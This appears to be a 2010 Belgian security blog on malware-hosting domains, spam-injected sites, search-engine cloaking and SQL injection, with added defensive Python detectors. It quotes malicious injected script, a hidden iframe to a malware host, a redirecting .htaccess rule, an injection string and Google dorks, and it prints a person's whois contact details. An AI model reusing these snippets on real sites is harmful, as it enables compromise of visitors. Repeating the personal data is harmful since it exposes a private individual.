itsecurity

  • some domains you could consider blacklisting

    while whitelisting the particular sites you need

    report from McAfee, see security dashboard - my diigolinks (documents)

    (screenshot: bo39.jpg)

  • Korean malware IP address 114.207.244.143

    This IP address has, according to Google Badware, been a hotbed of malware and infections

    (screenshot: bo38.jpg)

    as confirmed by trustedsource (HIGH Risk)

  • new rogue securityware from my-security93.co.cc passes different antivirus and other protections

    yes, on a machine with simple user rights (screenshot: bo37.jpg)

    yes, in Firefox with NoScript

    yes, with two antiviruses running on the machine

    yes, behind firewalls, proxies, blacklisting and so on

    yes, it just popped up and began scanning

    just closed down Firefox abruptly (list of applications

    No, I didn't download or install it, because if it can pass all that, what else can it do

    and the list of viruses it said it had found changes every time

    enough to scare the simple user away, and if it passes all these security things, it must be secure or part of the necessary security, no?

    It is NOT blacklisted yet

    http://www.robtex.com/dns/my-security93.co.cc.html

    and according to VirusTotal:

    Firefox: Clean site
    Google Safebrowsing: Clean site
    Opera: Clean site
    Phishtank: Clean site
    Smartscreen: Clean site
    TRUSTe: Clean site

    http://www.virustotal.com/

    It uses the following Korean servers

    114.207.244.143
    114.207.244.144
    114.207.244.145
    114.207.244.146

    on which there are a whole lot of other .cc servers (.cc is the domain of some small islands and a frequently abused domain zone)

    the technical people responsible are

    AS9318
    HANARO-AS Hanaro Telecom Inc. Yeoeuido-dong Yeongdeungpo-gu SEOUL 17-7 Asia One Bldg. 150-874

    These IP numbers are also used by Malaysian hackers because their sites are hosted there

    malaysian-hackers.co.cc

  • YouTube user thenameisskittles used in online malware campaign with .be sites

    It is being done by inserting pages that imitate YouTube pages with videos on other sites

    the trick is simple - to view the video you have to download a new codec - but that isn't a codec (it is a virus); explain that to your teenager who wants to see Justin Bieber and thinks it is some kind of YouTube.

    David Evans Controller | management.degarage.nl

    This site may harm your computer.
    DAVID EVANS CONTROLLER. thenameisskittles 18 videos. Subscribe. 151960 views. Help About Safety Privacy Terms . . david evans controller. . david evans ...
    management.degarage.nl/random/index.php?news=david-evans.

    The Google dork is: youtube thenameisskittles

    and for Belgium you add site:be; you can change that to whatever site or domain you need to check

    PROTEUS VSM 7.1 SP4

    This site may harm your computer. (PS: the same goes for all the rest below)

    PROTEUS VSM 7.1 SP4. thenameisskittles 4 videos. Subscribe. ... VSM 7.1 SP4, download PROTEUS VSM 7.1 SP4, EFFECTMATRIX YOUTUBE VIDEO DOWNLOAD TOOL PRO 3.0, ...
    www.jolieboutique.be/script/proteus+vsm+7.1+sp4.html

    justinbiebermusic.com\/goldenticket

    Be sure to subscribe to us, and Turnip Time www.youtube.com Thanks again to all that helped. ..... COM/GOLDENTICKET. thenameisskittles 4 videos Subscribe. ...
    os.be/info/justinbiebermusic.com%5C/goldenticket

    1. BARFOOTANDTHOMPSON.CO.NZ
       7 Jun 2010 ... Barfootandthompson.co.nz. belmont stakes odds . BARFOOTANDTHOMPSON.CO.NZ. thenameisskittles 4 videos. Subscribe . Barfootandthompson.co.nz ...
       gt-motorsports.be/webshop/.../barfootandthompson.co.nz.html

    2. EZRECORDED 1.0
       EZRECORDED 1.0. thenameisskittles 4 videos. Subscribe. 151960 views. Help · About · Safety · Privacy · Terms · Copyright . EZRecorded 1.0 ...
       www.manzi.be/script/EZRecorded+1.0.html

    3. Hot Video: pilipinas win na win
       13 Aug 2010 ... Na Win (First Episode) 31 July 2010 Brought to you by FlipBooth – The Pinoy Style Youtube . .... thenameisskittles 18 videos. Subscribe ...
       www.fitstar.be/images/page.php?page=pilipinas+win...

    4. LADYLADY345
       GROUP/LADYLADY345. thenameisskittles 4 videos. Subscribe. 151960 views. Help · About · Safety · Privacy · Terms · Copyright . ...
       www.loomans-distribution.be/catalog/.../ladylady345.html

    5. /SEARCH HL EN Q SITE WWW.YOUTUBE.COM YOUTUBE
       SEARCH HL EN Q SITE WWW.YOUTUBE.COM YOUTUBE. ... /SEARCH HL EN Q SITE WWW.YOUTUBE.COM YOUTUBE. thenameisskittles 4 videos. Subscribe. 151960 views ...
       www.leathershop.be/...//search+hl+en+q+site+www.youtube.com+youtube.html

    6. Hot Video: lil kim
       YouTube streaming video - Lil' Kim & Ray J Take Shots at Nicki Minaj . - During Lil Kim's Concert in New York ... thenameisskittles 18 videos. Subscribe ...
       www.mrwtrading.be/b2b/images/news.php?page=lil...

  • sleepy.be (commercial site) totally spam-hacked

    site:sleepy.be video as an example

    Supersize Me Video
    Supersize Me Video August 5, 2010. ... Supersize Me Video. Template design by Free CSS Templates · bo diddley · sandro kopp · gina gerson · kelsey grammer ...
    motieven.sleepy.be/sleepy/supersize-me-video.html

    Danny Almonte Video
    Danny Almonte Video August 8, 2010. ... Danny Almonte Video. Template design by Free CSS Templates · bo diddley · sandro kopp · gina gerson · kelsey grammer ...
    motieven.sleepy.be/sleepy/danny-almonte-video.html

    Elke The Stallion
    Download Elke The Stallion and Maliah Michel (Digital Dolls) video on savevid.com. ... I give you video model Elke the Stallion. Checkout her site, crazy. ...
    motieven.sleepy.be/sleepy/elke-the-stallion.html

    Khia New Video
    12 Aug 2010 ... Khia looks so excited to be trapped in a TV in Janet's new video . On the heels of her new single, “Been A Bad Girl,” Khia took time off . ...
    motieven.sleepy.be/sleepy/khia-new-video.html

    Cspan Video
    8 Aug 2010 ... Cspan Video August 8, 2010. ... Cspan Video. Template design by Free CSS Templates · cynthia rodriguez · lake county indiana ...
    motieven.sleepy.be/sleepy/cspan-video.html

    Royce Reed Video
    6 Aug 2010 ... Royce Reed Video August 6, 2010. ... Royce Reed Video. Template design by Free CSS Templates · tommy bowden · phiten necklaces ...
    motieven.sleepy.be/sleepy/royce-reed-video.html

    Pygmy Tarsier Video
    Pygmy Tarsier Video August 7, 2010. ... Pygmy Tarsier Video. Template design by Free CSS Templates · brooke astor · mark loretta · highdeas · matt holliday ...
    motieven.sleepy.be/sleepy/pygmy-tarsier-video.html

    City High Caramel Video
    6 Aug 2010 ... City High Caramel Video August 6, 2010. ... City High Caramel Video. Template design by Free CSS Templates ...
    motieven.sleepy.be/sleepy/city-high-caramel-video.html

  • Belgian site uses Justin Bieber to place malware

    Jamie Bieber Boyfriend Hot Video

    27 Jul 2010 ... jamie bieber boyfriend hot video · jamie boyfriend hot video justin bieber · bieber boyfriend hot video jamie foxx ...
    motieven.sleepy.be/.../jamie-bieber-boyfriend-hot-video.html

    This gives the following (RIPE whois record):
    person: Vadim Makarenko
    address: Leningradskaya 28 kv 26, Bendery, Moldova
    e-mail: XXXXXXX@gmail.com
    phone: +373-680-45324
    nic-hdl: VM3351-RIPE
    source: RIPE # Filtered

    This is a redirect

    It tries to install malware

    nobody noticed it since the 27th of July ..... today is the 19th

    going to report it to the CERT here

    Panda Labs found another 200 such sites

    I just tried the obvious title with site:be and found this one, but you can do this for any other country or domain extension

    "hot video : justin bieber" site:be

  • critical ADOBE PDF and flash updates

    Adobe is planning to release critical updates on August 19, 2010 for Adobe Reader 9.3.3 for Windows, Macintosh and Unix as well as the Adobe Acrobat 9.3.3 for Windows and Macintosh and an update for Adobe Reader 8.2.3 and Acrobat 8.2.3 for Windows and Macintosh covered in security bulletin APSB10-17. An update for Adobe Flash Player published in security bulletin APSB10-16 will be released as well.

    Affected software

    Adobe Reader 9.3.3 and earlier versions for Windows, Macintosh, and UNIX
    Adobe Acrobat 9.3.3 and earlier versions for Windows and Macintosh
    Adobe Flash Player 10.1.53.64 and earlier versions for Windows, Macintosh, Linux, and Solaris

    http://isc.sans.edu/index.html

    You have no choice but to install them: the number of attacks on these vulnerabilities is too big and the botnets that use them (Zeus for example) are too dangerous

  • stad Mechelen forgot about its old blog but spammers didn't

    The website stadmechelen.be now resolves to mechelen.be

    Under stadmechelen.be, which is still active, you have blog.stadmechelen.be, but that doesn't resolve to blog.mechelen.be or to a www.blog.stadmechelen.be; the blog has been transferred to mechelenblogt.be

    so far so good, but

    as the website stadmechelen.be is still active (in a redirect), blog.stadmechelen.be is also still active

    and has been abused by the following injected script

    <title>Best Searches</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <link rel="stylesheet" type="text/css" media="all" href="http://find.gl/js.css" />
    <script>
    function init_aw(){
        var children = document.getElementsByTagName('td');
        var l = children.length;
        var ri = 0;
        for(i=0;i<l;i++){
            if (children[i].className=='ac'){
                children[i].onmouseover=function (){this.className='ach';};
                children[i].onmouseout=function (){this.className='ac';};
                children[i].onclick=new Function('document.location="' + results[ri][3] + '";');
                ri++;
            }
        }
    }
    </script>
    </head>
    <body>
    <script src="http://find.gl/js.php?qr=3&f=h&q=inurl%3Acracks%20site%3Abe"></script>
    <script>document.onload=init_aw();</script>
    </body>

    and that gives you the following search results

    crack black and white 2 , download, cd to mp3 ripper v 5.2 serialz, counter strike license torrent,
    www.blog.stadmechelen.be/7645

    EWallet cell phone, download nitto 1320 cheat engine, 228289, crack sonar 4.01 producer edition,
    www.blog.stadmechelen.be/5951

    sonic pc download full, update firmware dth 222 2006, katja kassin sex and submission movie,

    for the foreign readers
    * Mechelen is a big city near Brussels
    * it has its fair share of problems and possible risks
    * according to official government rules, its official website is one of the main instruments of crisis communication if needed

  • observatoire du tourisme Wallonie.be infected with Viagra spam

    link


    Lkioweytrert generic zovirax - zovirax what is it viagra valium kamagra discreet uk europe - las vegas kamagra viagra about valtrex aciclovir zovirax - when does patent on valtrex expire imitrex story - purchase imitrex cash on del what is paxil - how ...
    observatoire.tourisme.wallonie.be/apps/spip/article.php3?id...

    DrLaquanda 1, cheap viagra in moldova, kmb, purchase zovirax in djibouti, gcnrcx, purchase sumycin in iowa, 016928, buy biaxin er online without a prescription, ldm, buy darvocet in alberta, knk, buy cheap tadalafil online cheap vs generic., :-]],
    observatoire.tourisme.wallonie.be/apps/spip/article.php3?id...

    SynxavIQZxwdi tramadol imq viagra ljpem xanax hun buy 150 tramadol =] acomplia qjws Proposé le 23 mai 2010, par TRJdivGdAAK tYMwqLGQnhuXmg no prescription cialis 41514 retin :-[ buy href tramadol 363 ultram pill identifier 4856 tramadol
    observatoire.tourisme.wallonie.be/apps/spip/article.php3?id...

    http://miguelcabrera.us/index.html comment5, Tamiflu, Zithromax, Nolvadex, Retin-A, Viagra, Metformin, Proposé le 13 juillet 2010, par Ambien http://tulowitzki.us/index.html comment5, Xanax, Tamiflu, Nolvadex, Retin-A, Bactrim, Proposé ...
    observatoire.tourisme.wallonie.be/apps/spip/article.php3?id...

    DrLou 1, cheapest sale viagra purchase viagra buy in uk high quality. online no prescription ! !, [url="http://wvagp.org/Forums/members/Buy-VIAGRA-On-Line.aspx"]cheapest sale viagra purchase viagra buy in uk high quality. online no ...
    observatoire.tourisme.wallonie.be/apps/spip/article.php3?id...

  • a hidden compromised website: now the PHP trick

    We have seen in the previous post how an attacker hides his success by using Apache server modules to serve different pages to normal visitors (the real website) and to search engines (the spam/scam pages he added).

    There is another trick one can do, according to the Internet Storm Center.

    On a PHP site one can add a script that asks the attacker's controller which page to serve to whom; its instructions are more or less identical.

    "The attackers planted one file (usually called page.php or wp-page.php) on every web site – they didn’t change anything else. The page.php script does the majority of work. It actually just asks the main controller what to do when it receives a request. The request sent to the controller is interesting – it downloads another PHP script from the controller and executes it via an eval() call. This allows the attackers to be able to constantly change how any script behaves. This master script, in a nutshell, does this:

    First it checks if the request to the page.php script contains the “r=” parameter. If it doesn’t (meaning, you accessed the script directly) it displays a 404 error. Clever, so they hide it if you try to access it directly.

    1. if the User Agent shows that the request is coming from a Google, Yahoo or Bing bot, special content with links to rogue securityware is returned.

    2. if you visit the script directly (no referrer) it again displays a 404 error.

    3. if the referrer is set to Google, Yahoo or Bing (meaning, the user clicked on a search result), the browser is redirected to a third site (and possibly a fourth) that displays the infamous RogueAV"

    The rest of the technicalities is explained in the post, but it is clear that if you use PHP you should patch and harden every time, any time, and if you can't do it yourself you should make sure that some hoster is doing it for you; otherwise, one moment or another, you will be cooked.
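    The cloaking described in the quoted post leaves a trace in the web server's own access log: the same path answers 200 to Googlebot, 404 to a direct visitor and 302 to someone arriving from a search result. As an added example (my own code, not from the ISC diary and not the author's), the Python script below parses Apache combined-format log lines and flags paths showing that pattern; the sample log lines, the IP addresses, the crawler user-agent list and the search-engine referrer pattern are constructed for the example.

```python
import re
from collections import defaultdict

# Apache "combined" log format; the constructed sample lines below follow it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Crawler user-agents and search-engine referrers the cloaking script keys on (assumed list).
BOT_UA = re.compile(r'googlebot|yahoo! slurp|bingbot|msnbot', re.I)
SEARCH_REF = re.compile(r'^https?://([^/]*\.)?(google|yahoo|bing)\.', re.I)


def parse_log(lines):
    """Yield one dict per well-formed combined-format line; skip anything else."""
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m:
            yield m.groupdict()


def audience(entry):
    """Classify a request the way the cloaking script does: crawler,
    visitor arriving from a search result, or direct visitor."""
    if BOT_UA.search(entry['ua']):
        return 'bot'
    if SEARCH_REF.match(entry['referer']):
        return 'search_referred'
    return 'direct'


def cloaking_reasons(by_audience):
    """Return the cloaking patterns visible in one path's status codes per audience."""
    bot = by_audience.get('bot', set())
    direct = by_audience.get('direct', set())
    referred = by_audience.get('search_referred', set())
    reasons = []
    # page.php trick: crawlers get content, direct requests get a fake 404
    if 200 in bot and direct and direct <= {404}:
        reasons.append('crawlers get 200, direct visitors only get 404')
    # redirect trick: only visitors coming from a search engine are sent elsewhere
    if referred and all(300 <= s < 400 for s in referred) and (200 in bot or 200 in direct):
        reasons.append('search-referred visitors are redirected, others are served')
    return reasons


def find_cloaked_paths(lines):
    """Map each suspicious path (query string stripped) to the reasons it was flagged."""
    seen = defaultdict(lambda: defaultdict(set))
    for e in parse_log(lines):
        path = e['path'].split('?', 1)[0]
        seen[path][audience(e)].add(int(e['status']))
    flagged = {}
    for path, by_aud in seen.items():
        reasons = cloaking_reasons(by_aud)
        if reasons:
            flagged[path] = reasons
    return flagged


# Constructed sample: one cloaked page.php and one normal index.php.
SAMPLE_LOG = """\
66.249.65.1 - - [19/Aug/2010:10:00:01 +0200] "GET /page.php?r=viagra HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.0.113.5 - - [19/Aug/2010:10:02:13 +0200] "GET /page.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1) Firefox/3.6"
198.51.100.7 - - [19/Aug/2010:10:03:40 +0200] "GET /page.php?r=viagra HTTP/1.1" 302 0 "http://www.google.be/search?q=cheap+viagra" "Mozilla/5.0 (Windows; U; Windows NT 5.1) Firefox/3.6"
198.51.100.8 - - [19/Aug/2010:10:04:01 +0200] "GET /index.php HTTP/1.1" 200 8800 "http://www.google.be/search?q=library" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)"
66.249.65.1 - - [19/Aug/2010:10:05:22 +0200] "GET /index.php HTTP/1.1" 200 8800 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.0.113.9 - - [19/Aug/2010:10:06:00 +0200] "GET /index.php HTTP/1.1" 200 8800 "-" "Mozilla/5.0 (X11; Linux) Firefox/3.6"
"""

if __name__ == '__main__':
    for path, reasons in find_cloaked_paths(SAMPLE_LOG.splitlines()).items():
        print(path, '->', '; '.join(reasons))
```

    Run it over a real access log with `find_cloaked_paths(open('access.log'))`; a path that is flagged is worth fetching by hand with a crawler user-agent and with a search-engine referrer to confirm the difference, and remember that the attacker may also have tampered with the logging itself.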

  • another twist in compromising websites - .htaccess control and search engine poisoning

    We have seen that some malvertising (and the drive-by malware downloads or redirects) is only shown to a certain number of visitors, and if I remember well the same was seen in some DNS poisoning.

    In this post from the Internet Storm Center there is something even more interesting: trying to hide the fact that a site is compromised (probably from search engines and security bots scanning for infections and take-overs).

    The same site is sometimes infected/taken over and sometimes not, just the normal library site.

    "Rather than mucking around with the code for the site itself, the bad guys target the .htaccess files.  For those of you unfamiliar with the workings of webservers, .htaccess files are used by the Apache webserver (and some others…) to provide a way to make configuration changes to the server itself, on a per-directory basis.  So, for instance, you can use an .htaccess file to change the way that the webserver treats specific types of files in a single directory only.

    The bad guys also leverage another Apache “tool,” known as mod_rewrite. This tool provides a rule-based rewriting engine (based on a regular-expression parser) to rewrite requested URLs on the fly.

    So, while I never actually got my hands on an altered .htaccess file, I have a pretty good idea of what they look like:

    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*google.*(cialis|viagra|levitra).*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.*(cialis|viagra|levitra).*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*bing.*(cialis|viagra|levitra).*$
    RewriteRule .* http://badsite.com [R,L]

    http://isc.sans.edu/diary.html?storyid=9388"

    The result is that when Google comes by it will index the added pages, with scams and spam in the best case and porn, pirated films or credit cards in the worst case. This should show up in your logs - unless they also changed the logging to suppress it for these new pages. Your normal visitors, and probably you yourself, will see nothing of it and will work on a normal website like before.

    It means that you need tripwire-like monitoring of everything on your webserver. If something changes somewhere, you should know, or be able to know.
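    What that tripwire-like monitoring can look like for a web root, as an added example (my own code, not from the ISC diary and not the author's): a Python script that records a SHA-256 manifest of every file (dotfiles such as .htaccess included), diffs a later manifest against it, and separately inspects .htaccess for the referrer-keyed RewriteCond / external RewriteRule pattern quoted above. The demo() function plays out a constructed compromise inside a temporary directory; the file contents and the host badsite.example are placeholders.

```python
import hashlib
import os
import re
import tempfile


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, 'rb') as f:
        for chunk in iter(lambda: f.read(65536), b''):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Relative path -> SHA-256 for every file under root (dotfiles included)."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            manifest[os.path.relpath(full, root)] = sha256_file(full)
    return manifest


def diff_manifest(baseline, current):
    """(added, removed, changed) relative paths, each sorted."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    changed = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    return added, removed, changed


# A RewriteCond keyed on a search-engine referrer, or a RewriteRule sending visitors to an
# external URL: the shape of the altered .htaccess described in the ISC diary.
REFERER_COND = re.compile(r'^\s*RewriteCond\s+%\{HTTP_REFERER\}.*(google|yahoo|bing)', re.I)
EXTERNAL_RULE = re.compile(r'^\s*RewriteRule\s+\S+\s+https?://', re.I)


def suspicious_htaccess_lines(text):
    return [line.strip() for line in text.splitlines()
            if REFERER_COND.match(line) or EXTERNAL_RULE.match(line)]


def demo():
    """Simulate a compromise in a temporary web root and report what the monitor sees."""
    with tempfile.TemporaryDirectory() as root:
        def write(rel, content):
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, 'w') as f:
                f.write(content)

        def read(rel):
            with open(os.path.join(root, rel)) as f:
                return f.read()

        # constructed baseline: a benign redirect rule and two PHP files
        write('.htaccess', 'RewriteEngine On\nRewriteRule ^old$ /new [R=301,L]\n')
        write('index.php', '<?php echo "library catalogue"; ?>\n')
        write('lib/helper.php', '<?php function h($s) { return htmlspecialchars($s); } ?>\n')
        baseline = build_manifest(root)

        # constructed compromise: referrer-based rewrite appended, a new script dropped,
        # index.php modified (badsite.example is a placeholder)
        write('.htaccess', read('.htaccess') +
              'RewriteCond %{HTTP_REFERER} .*google.*(cialis|viagra).*$ [NC,OR]\n'
              'RewriteCond %{HTTP_REFERER} .*yahoo.*(cialis|viagra).*$ [NC,OR]\n'
              'RewriteCond %{HTTP_REFERER} .*bing.*(cialis|viagra).*$\n'
              'RewriteRule .* http://badsite.example [R,L]\n')
        write('page.php', '<?php /* dropped script, contents irrelevant here */ ?>\n')
        write('index.php', '<?php echo "library catalogue"; include "page.php"; ?>\n')
        current = build_manifest(root)

        added, removed, changed = diff_manifest(baseline, current)
        flagged = suspicious_htaccess_lines(read('.htaccess'))
        return {'added': added, 'removed': removed, 'changed': changed, 'flagged': flagged}


if __name__ == '__main__':
    for key, value in demo().items():
        print(key, value)
```

    In practice the baseline manifest is written to a location the web server account cannot modify and the comparison runs from cron; the .htaccess check is a cheap second signal because a rewrite keyed on HTTP_REFERER and a search-engine name has no legitimate reason to exist on a library or magazine site.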

     

  • Humo, Libelle, Telemoustique were lucky, others still sleeping malware agents for nemohuildiin.ru

    First, not all sites or pages shown by Google dorks are in fact still infected; the reason is that they didn't indicate to Google that they were the owners of the domain, so Google didn't come back after the clean-up.

    But it does show that these sites were injected with this kind of script and maybe haven't reviewed their security policies, and can in future be abused again.

    If you read the post on the Internet Storm Center, it is interesting that those infections were, for the moment, not only very professional but also didn't load any malware... until when? When you take into consideration that the site in question is on the list of Zeus botnet command and control servers, you can only assume that they were building a new network for a new attack (linked to spam that would have sent their users to these pages on these normal, trustworthy, popular websites of popular magazines). Or that some of the network has been disbanded or taken over and that they couldn't get access to their infected 'sleeping cells' (terrorism language).

    and this advice you should post on your wall somewhere

    "SQL injection is bad and something people need to avoid by developing web applications safely. There are some tips for this:

    • Sanitize input data: Input entered from the user should not contain any sql sentences or commands at all. Check for good data by validating for type, length, format, and range.
    • Use stored procedures: Your web application should have predetermined SQL sentences for data access. If the user requests some specific information, the application invokes the specific stored procedure, so there is no possibility of crafting a dynamic SQL request.
    • Use an account with restricted permissions in the database. You should only grant execute permissions to selected stored procedures in the database and provide no direct table access.
    • Avoid disclosing database error information. Make sure you do not disclose detailed error messages to the user, because detailed error information shows the attacker where to check if the attack was unsuccessful."

    http://isc.sans.edu/diary.html?storyid=9397
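    The first and last of those four tips can be shown in a few lines, as an added example (my own code, not from the ISC diary and not the author's): a Python/SQLite lookup built by string concatenation next to the same lookup with input validation, a bound parameter and an error path that discloses nothing. SQLite has neither stored procedures nor per-account permissions, so the second and third tips are left to the database deployment; the user table and the names in it are constructed.

```python
import re
import sqlite3


def make_db():
    """Constructed in-memory user table standing in for the web application's database."""
    conn = sqlite3.connect(':memory:')
    conn.execute('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)')
    conn.executemany('INSERT INTO users (username, email) VALUES (?, ?)',
                     [('alice', 'alice@example.org'), ('bob', 'bob@example.org'),
                      ('carol', 'carol@example.org')])
    conn.commit()
    return conn


def lookup_vulnerable(conn, username):
    """Dynamic SQL built by string concatenation: the input becomes part of the statement."""
    sql = "SELECT username, email FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, username):
    """Bound parameter: the input is only ever data, never part of the statement."""
    return conn.execute('SELECT username, email FROM users WHERE username = ?',
                        (username,)).fetchall()


# Type/length/format/range check for this field: lowercase alphanumerics, 1-32 characters.
USERNAME_RE = re.compile(r'^[a-z0-9_]{1,32}$')


def validate_username(username):
    return bool(USERNAME_RE.match(username))


class RejectedInput(ValueError):
    pass


def lookup_safe(conn, username):
    """Validation, then a parameterized query, then an error path that discloses nothing."""
    if not validate_username(username):
        raise RejectedInput('invalid username')
    try:
        return lookup_parameterized(conn, username)
    except sqlite3.Error as exc:
        # Keep the detail server-side (print stands in for a real logger here);
        # the caller only ever sees a generic message.
        print('db error:', exc)
        raise RuntimeError('lookup failed') from None


if __name__ == '__main__':
    db = make_db()
    payload = "' OR '1'='1"              # the textbook injection string
    print(lookup_vulnerable(db, payload))    # every row comes back
    print(lookup_parameterized(db, payload)) # no user has that literal name, so []
    print(validate_username(payload))        # False: rejected before any SQL runs
```

    Both layers matter: the bound parameter alone already defeats the injection, and the validation layer additionally stops the request before it reaches the database at all, which is where the quoted advice about restricted accounts and generic error messages also pays off.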

     

     

  • fast-flux botnet campaigns with .eu domain names

    Arbor Networks

    iseveral.eu
    lifestylerxdrugs.eu
    medicationjobs.eu
    nypharmacyjobs.eu
    rxdrugscentral.eu
    rxdrugsdot.eu
    rxdrugsinc.eu
    selfcarepharmacy.eu
    superhotpharmacy.eu
    yourchoicepharmacy.eu

    these are pure fast-flux domain names that can only be blocked by the .eu operator (based in Belgium)

    It is clear that many of those new fast-flux domain names are being used for health spam campaigns

    Many of them are .ru domain names (and .com and .net, but you can't block those domain extensions)

  • security problems with NTLM make me laugh

    There have been some problems with NTLM and some hype and crisis communication about it

    But NTLM was never intended to be a very secure protocol for communication and authentication.

    In Windows 7 it is OFF by default.

    You should use Kerberos.

    Don't go on trying to fix that old NTLM, just use Kerberos or smartcard authentication or whatever

    and as for the articles, it is summertime...

  • small hosters and ISPs targeted by malware hosters

    not to attack you

    but to pay you real hard dollars for hosting

    as long as you don't ask too many questions

    and don't have too much security

    and don't respond too quickly to complaints about me

    it has in fact been seen for the last year, but is becoming more a method of 'flux hosting', jumping from one host to another

    The problem with such small ISPs/hosters is that in small countries they are so important in their own country/network that many other businesses and even government services are affected when the world begins to blacklist the whole network/host/domain zone. As these are small networks or countries, most of the world doesn't care a bit about their network or domain extension, because the relative influence is nil.

    Just block it, we don't have time for this; let them clean up their business and then we will see afterwards, we have more important things to do than a domain extension, network or country very few care about.

    This is what is happening with .lv (Latvia) and Spamhaus (with the security community siding with Spamhaus)

    So even if you are a small hoster, ISP, network or domain extension, you still need to

    * have a general minimal security installation (antivirus, firewall, IDS, ...)

    * have a contactable security team that responds quickly to incidents that are brought to their attention or that they have detected

    otherwise you are just thrown into the black hole of the internet, ready to be forgotten

  • better a web application firewall than having to make your pages turn into this

    when some big Belgian sites were attacked with the Zeus redirection scripts, they had to act swiftly because Belgian visitors were actively being redirected

    so they deactivated the HTML, the scripts and the links

    but this makes some old pages look ugly

    (screenshot: bo36.jpg)

    the alternative is setting up a WAF with a blacklist in front of your sites - filtering incoming and outgoing traffic - to defend yourself and your visitors/clients, and your income, as you can't be used to attack others and be sued for it.

  • when you have cleaned up your SQL injections, go to Google

    As long as you haven't gone to Google, registered yourself and inserted the code proving that you are the domain owner into your websites, you can't ask Google to revisit your pages quickly and to forget that you were once infected or hacked

    Many sites today are still listed in Google as hacked or injected

    Those that were injected run the most risk of simply being blocked by lists and crawlers

    and who will want to go to a page for which they receive a warning?

    while there are thousands of other pages from your competitors to visit that don't have such a warning?

    example
    Links | Libelle
    Libelle is the magazine for the active woman, who not only finds her family important but also her own development and the world she lives in.
    www.libelle.be/lib/op-stap/links.html?subcatId=113

    Te koop (For sale) - ABIP IMMO
    Gemeente: Roosdaal<iframe src="http://nemohuildiin.ru/tds/go.php?sid=1" width="0" height="0" style="display:none"></iframe> Prijs: € 285.000,00 ...
    www.abipimmo.be/showresults.asp?Tid=322

    It also means that all those searches for scripts and hacks that show thousands of pages aren't necessarily all true, but they do show at the very least that the person didn't finish the job completely (so can you expect them to also block the injections in future?)

    once attacked always scanned and attacked
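    The injected iframe in the ABIP IMMO listing above has the three tell-tales a scanner can key on: zero width and height, display:none, and a src on another host. As an added example (my own code, not the author's), the Python scanner below walks a page with the standard-library HTML parser and reports iframes that are hidden that way, noting when they also point off-site; the sample page and the host tds.example are constructed placeholders modelled on the listing.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class HiddenIframeFinder(HTMLParser):
    """Collect <iframe> tags that are made invisible (zero size or CSS-hidden)."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != 'iframe':
            return
        a = {k.lower(): (v or '') for k, v in attrs}
        reasons = []
        dims = (a.get('width', '').strip().lower(), a.get('height', '').strip().lower())
        if any(d in ('0', '0px') for d in dims):
            reasons.append('zero-size')
        style = a.get('style', '').replace(' ', '').lower()
        if 'display:none' in style or 'visibility:hidden' in style:
            reasons.append('hidden-by-style')
        if not reasons:
            return  # a visible iframe (an embedded video, say) is not what we look for
        src = a.get('src', '')
        host = (urlparse(src).hostname or '').lower()
        if host and host != self.page_host:
            reasons.append('off-site')
        self.findings.append({'line': self.getpos()[0], 'src': src, 'reasons': reasons})


def find_hidden_iframes(html, page_host):
    """Return one finding per hidden iframe: source line, src attribute and reasons."""
    p = HiddenIframeFinder(page_host)
    p.feed(html)
    p.close()
    return p.findings


# Constructed page modelled on the injected listing; tds.example is a placeholder host.
SAMPLE_HTML = """<html><body>
<h1>Te koop</h1>
<p>Gemeente: Roosdaal<iframe src="http://tds.example/go.php?sid=1" width="0" height="0" style="display:none"></iframe> Prijs: 285000</p>
<iframe src="http://www.youtube.com/embed/placeholder" width="425" height="344"></iframe>
</body></html>
"""

if __name__ == '__main__':
    for finding in find_hidden_iframes(SAMPLE_HTML, 'www.abipimmo.be'):
        print(finding)
```

    Running this over every page a site serves (or over the HTML a crawler fetched) finds the injection whether or not Google has re-indexed the page yet; the visible YouTube embed in the sample is deliberately left alone so that legitimate off-site frames do not drown the real hits.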

  • finding infected posts with trustedsource.org (Telenet, Belgacom and other Belgian ISPs)

    When you go to www.trustedsource.org you can type in the name of the domain and then you will see whether it is generally trusted or not

    If you have more than one post (host) or server that may send mail, you will see further down the page the change in the number of emails being sent from this post or server.

    Normally an increase of at least 100% will probably have something to do with a virus or spam operation

    Let's take for example http://www.trustedsource.org/query/telenet.be

    Then you will find the following posts that are, according to this analysis, probably infected (all on Sunday)

    http://www.trustedsource.org/query/81.82.254.17

    http://www.trustedsource.org/query/81.82.233.5

    http://www.trustedsource.org/query/84.199.49.98

    http://www.trustedsource.org/query/81.82.197.34

    If we take skynet.be

    http://www.trustedsource.org/query/194.78.197.208

    http://www.trustedsource.org/query/194.78.221.215

    or scarlet.be

    http://www.trustedsource.org/query/62.235.228.87

    http://www.trustedsource.org/query/62.235.232.224

    http://www.trustedsource.org/query/62.235.241.85

